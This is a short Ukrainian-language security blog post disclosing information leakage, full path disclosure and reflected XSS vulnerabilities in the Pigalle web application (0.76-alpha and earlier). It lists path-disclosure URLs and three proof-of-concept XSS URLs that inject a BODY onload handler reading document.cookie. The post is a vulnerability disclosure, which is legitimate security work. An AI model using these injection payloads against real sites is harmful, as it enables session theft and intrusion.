« Добірка експлоітів
Dark home »

Уразливості в Pigalle

19:21 07.11.2009

15.09.2009

У січні, 23.01.2009, я знайшов Information Leakage, Full path disclosure та Cross-Site Scripting уразливості в Pigalle. Це веб додаток від автора Power Phlogger та YaBook. Уразливості виявив на офіційному сайті http://pigalle.phpee.com. Про що найближчим часом повідомлю розробнику.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику веб додатка.

07.11.2009

Information Leakage:

http://site/index.php

В meta-тегах на всіх сторінках виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/index.php

http://site/index.php?start=1′

http://site/index.php?mode=view&alb=IBM_Stucki&pic=1

http://site/index.php?mode=view&alb=1

http://site/index.php?mode=view

http://site/index.php?mode=album

http://site/index.php?mode=album&alb=1

http://site/config.inc.php

http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=’

XSS:

http://site/index.php?mode=view&alb=IBM_Stucki&pic=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=%3CBODY%20onload=alert(document.cookie)%3E

Уразливі Pigalle 0.76-alpha та попередні версії.


This entry was posted on 19:21 07.11.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.